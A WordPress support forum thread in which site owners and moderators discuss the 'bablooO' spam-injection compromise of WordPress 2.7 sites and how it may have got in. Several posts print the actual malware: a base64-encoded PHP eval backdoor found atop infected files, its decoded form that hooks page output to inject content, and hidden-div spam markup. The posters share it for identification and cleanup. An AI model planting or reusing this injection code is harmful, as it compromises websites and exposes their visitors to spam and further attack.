WordPress.org

Forums

WordPress › Support » How-To and Troubleshooting

bablooO/blyat attacks on WP 2.7.0 and 2.7.1 (24 posts)

  1. anoncobard
    Member
    Posted 4 years ago #

    One of my sites suffered an attack in recent weeks which I can't find documented in the WordPress forums.

    The symptom is hidden spam content in posts with an HTML comment fingerprint like:

    <!-- bablooO-start -->

    Some people report the string "blyat" instead of "bablooO". The attack has been reported for both 2.7.0 and 2.7.1 installations of WordPress. So far I can't find anyone who reports this problem and has figured out how the intruder got in. The most extensive discussion I can find is at:

    http://ckon.wordpress.com/2009/06/05/bablooo-spammer-attack-on-several-wp-blogs/

    Is this a known attack? Is there an official channel through which to report this kind of thing?

    Thanks.

    [Sorry for the anonymous handle but I don't want to advertise an unclosed vulnerability on my site.]

  2. SterlingCamden
    Member
    Posted 4 years ago #

    One of my sites is experiencing this as well, but the spam content is being injected into the RSS2 feed instead. I've upgraded to 2.8 and it still seems to be happening (unless it's being cached somewhere). I have not seen any of this spam in the posts themselves.

  3. anoncobard
    Member
    Posted 4 years ago #

    Sterling, when you say "it still seems to be happening" do you mean that you're seeing new spam content added even after you upgraded to 2.8?

    I saw in your ckon comment that you have the spam in your posts as well as in your RSS feed, it's just that it's invisible unless you view source. That's one of the characteristics of this attack.

    As near as I can tell from the discussion on ckon, some people are finding the spam inserted in their theme files (particularly footer.php, and particularly people who have writable themes folders and use the theme editor) while others are seeing it inserted into blog posts in their database. It sounds like you're in the latter category.

    You can see the extent of the damage to your database by using the WP Export feature (built right into WP, under Tools) to save your content as an XML file. Then load the XML file into a text editor and see how many posts the spam content shows up in.

    Checking for damage to your themes or other WP files is trickier unless you're comfortable with command-line tools like grep. If you're not a command-line person you could still FTP your theme files down to your desktop and examine them in a text editor.

    Please let us know if you find anything that might be useful.

  4. SterlingCamden
    Member
    Posted 4 years ago #

    Correction: the content was in the posts in the database, but it was enclosed in a <p> element that was styled with height:0 and width:0, so I could only see it in the feed or with "view source".

    I changed my admin password and cleaned the affected posts.

    Please notify me if/when you get more info on how this might have happened.

  5. SterlingCamden
    Member
    Posted 4 years ago #

    Just saw your response.

    I'm not seeing any damage to theme files. It was only in the posts themselves. I suppose this has to be some sort of password security breach -- either they hacked into my admin password or they found a way to get around the password permissions.

  6. SterlingCamden
    Member
    Posted 4 years ago #

    I have not seen any new spam content since I upgraded to 2.8 and changed the admin password. No other users have privileges beyond "Subscriber".

  7. anoncobard
    Member
    Posted 4 years ago #

    I found one hole: a third-party theme wasn't validating its arguments. I've confirmed that it was vulnerable to cross-site scripting (XSS) by appending javascript to a URL. Background:

    http://codex.wordpress.org/Data_Validation
    http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

    I added a line of input validation to the theme and sent the patch to the theme developers. Hole closed.

    Now my burning question is whether that hole is the likely source of my intrusion or there are others. The symptoms we bablooO victims describe seem most consistent with an intruder being able to log into WordPress using the admin account. In practical terms is a javascript insertion in the URL really likely to result in interactive access to the WP Dashboard?

  8. coolgeee
    Member
    Posted 4 years ago #

    <? /**/eval(base64_decode... ?>

    I found this code added to many of my files. I am uninstalling many of the sites now and going to older backups.

    Almost all of my wordpress sites on the same server has been attacked with this.

  9. anoncobard
    Member
    Posted 4 years ago #

    Coolgeee, was this code in addition to the bablooO spam HTML or instead of it?

  10. coolgeee
    Member
    Posted 4 years ago #

    I am checking now.

    But I do notice that almost all my file have this code added to the beginning of the files, like index.php, etc

  11. coolgeee
    Member
    Posted 4 years ago #

    example:
    in the wp-app.php file here is the code: (it is in all the files!!!

    <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9jb250ZW50L2cvbC9vL2dsb2JhbGJpendvcmtzL2h0bWwvaW5mb3JtZWRueS9UaGVtZXMvZGVmYXVsdC9pbWFnZXMvcG9zdC9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvY29udGVudC9nL2wvby9nbG9iYWxiaXp3b3Jrcy9odG1sL2luZm9ybWVkbnkvVGhlbWVzL2RlZmF1bHQvaW1hZ2VzL3Bvc3Qvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

  12. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    In practical terms is a javascript insertion in the URL really likely to result in interactive access to the WP Dashboard?

    It's possible. If they can get some javascript onto your page in a permanent fashion, then the next time you (the admin) visits the page, that script could send them your admin cookie, which would let them get into the site even though they lacked the password.

    With the admin cookie, they effectively become the admin for a short period (until it expires). The first step would likely be an automated script injection, where they use the plugin or theme editor to inject php code into some file, giving them backdoor access. From there, they could do anything they want until you find and remove that code.

    Mitigation: You can instantly invalidate all cookies to the site by changing the secret keys. See here for info on how to do that: http://wordpress.org/support/topic/170987

  13. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    But I do notice that almost all my file have this code added to the beginning of the files, like index.php, etc

    If that is the case, then it's probable that they got in via a different means. I have often seen this occur on shared webhosting services with poor security between different customers.

    In other words, if you're sharing a server with 50 other sites, and any one of those other sites gets hacked, then the attacker can run a script to automatically add his hack code to all the sites on that server, unless the server is well-secured (many are not). Usually these scripts look for anything ending in PHP, for example, and just add the code to them blindly.

  14. coolgeee
    Member
    Posted 4 years ago #

    thanks

    I will update any findings shortly

  15. coolgeee
    Member
    Posted 4 years ago #

    this is what my php.ini looks like:
    register_globals = off
    allow_url_fopen = off

    expose_php = Off
    max_input_time = 60
    variables_order = "EGPCS"
    extension_dir = ./
    upload_tmp_dir = /tmp
    precision = 12
    SMTP = relay-hosting.secureserver.net
    url_rewriter.tags = "a=href,area=href,frame=src,input=src,form=,fieldset="

    [Zend]
    zend_extension=/usr/local/zo/ZendExtensionManager.so
    zend_extension=/usr/local/zo/4_3/ZendOptimizer.so

    does this look corrupt?

  16. coolgeee
    Member
    Posted 4 years ago #

    All these files aslos had added code to it.

    wp-pass.php
    wp-commentsrss2.php

    my wp-pass.php:
    <?php
    /**
    * Creates the password cookie and redirects back to where the
    * visitor was before.
    *
    * @package WordPress
    */

    /** Make sure that the WordPress bootstrap has ran before continuing. */
    require( dirname(__FILE__) . '/wp-load.php');

    if ( get_magic_quotes_gpc() )
    $_POST['post_password'] = stripslashes($_POST['post_password']);

    // 10 days
    setcookie('wp-postpass_' . COOKIEHASH, $_POST['post_password'], time() + 864000, COOKIEPATH);

    wp_safe_redirect(wp_get_referer());
    ?>

  17. coolgeee
    Member
    Posted 4 years ago #

    bump

    anyone else have this issue

    It totally infected every php file across 15 domains!

  18. Jan Dembowski
    Volunteer Mod. & Brute Squad
    Posted 4 years ago #

    Same server or different servers?

  19. coolgeee
    Member
    Posted 4 years ago #

    same server

    I uninstalled about 10 sites already.

    3 sites I really do not want to lose, so I am coping them to my harddrive and then I will manually delete all corrupt files.

    Any easier way?

  20. coolgeee
    Member
    Posted 4 years ago #

    I am still wondering how the hack happened?

  21. Jan Dembowski
    Volunteer Mod. & Brute Squad
    Posted 4 years ago #

    If it's the same server then it's easy: your server is not secure. There is not a lot WordPress can prevent if your server gets compromised.

    Backing up alone will not do it, you need to identify via your servers logs how the exploit got onto your blogs. If you just clean it up without closing the door, you will be back here again with the same problem.

    Read up on the link I posted to you in the other thread:

    http://wordpress.org/support/topic/268083?replies=5#post-1065779

    Also read up on "Hardening WordPress" as well.

    Good luck.

  22. fennecfanatic
    Member
    Posted 3 years ago #

    The contents of that base64 block:
    if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/content/g/l/o/globalbizworks/html/informedny/Themes/default/images/post/style.css.php')){include_once('/home/content/g/l/o/globalbizworks/html/informedny/Themes/default/images/post/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

  23. volleyballmaniac
    Member
    Posted 3 years ago #

    My site also got hacked hotguam.com (running on MU 2.7.1).

    That's what I get for being lazy. Fortunately I just did a full backup of all server files & DB, so I will be doing a full purge & replace & then upgrading.

  24. WP Jockey
    Member
    Posted 3 years ago #

    +1
    My WP 2.9.2 is getting hit by this regularly.
    Today I got a de-listing notice from Google because of it.
    Not happy.

    I removed the 321 lines of the following code from Footer.php below the QuantCast tag...

    <!-- bablooO-start --><style>div.VnvpcQAFEL {height: 0pt;width: 2pt;position: absolute;overflow: auto}</style><div class="VnvpcQAFEL"><a href="http://www.downtube.com/UCC/casino/index.html">australian online poker</a>
<a href="http://www.downtube.com/UCC/casino/online-poker-leagues.html">online poker leagues</a>

    Obviously it goes on and on. I just wanted to include the "bablooO" and "VnvpcQAFEL" signatures in the hopes that we can stop these WP terrorists.

    Thank you for any help.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags